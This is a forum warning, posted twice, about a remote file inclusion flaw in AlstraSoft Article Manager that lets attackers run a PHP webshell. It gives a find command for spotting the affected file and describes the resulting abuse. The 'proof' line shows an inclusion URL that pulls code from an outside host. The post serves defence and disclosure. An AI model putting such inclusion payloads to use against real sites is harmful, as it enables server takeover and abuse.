Hey all,
If a user is using AlstraSoft Article Manager, there is currently an exploit which allows the script to INCLUDE any URL on the net. If the URL points to a TEXT version of a PHP script, it will execute it IN the body of the Article Site Manager thus spawning a PHP webshell.
If you suspect someone is running this, search for these common files in a Linux shell as root or a sudoer:
find /home -name "mostpopulararticles.php"
If you find this, please be weary. I've already proven it on two of my dedicated server owners and man, it's nasty. The script kiddies used it and uploaded 4.5 GIG's of DVD RIPs.
The proof in the pudding:
http://infectedarticlesite.com/?page=http://somedomain.com/file.txt
Mods, I hope this is appropriate; we don't have a security section and really, I think everyone should know this exploit exists since my server got hit and our main pipe was crippled with 90Mbit of UDP ping traffic (UDP flood through IRC, planted by the webshell).
Don't get caught with your pants down folks, stay alert!
Jamie
If a user is using AlstraSoft Article Manager, there is currently an exploit which allows the script to INCLUDE any URL on the net. If the URL points to a TEXT version of a PHP script, it will execute it IN the body of the Article Site Manager thus spawning a PHP webshell.
If you suspect someone is running this, search for these common files in a Linux shell as root or a sudoer:
find /home -name "mostpopulararticles.php"
If you find this, please be weary. I've already proven it on two of my dedicated server owners and man, it's nasty. The script kiddies used it and uploaded 4.5 GIG's of DVD RIPs.
The proof in the pudding:
http://infectedarticlesite.com/?page=http://somedomain.com/file.txt
Mods, I hope this is appropriate; we don't have a security section and really, I think everyone should know this exploit exists since my server got hit and our main pipe was crippled with 90Mbit of UDP ping traffic (UDP flood through IRC, planted by the webshell).
Don't get caught with your pants down folks, stay alert!
Jamie
I'll stick to mine.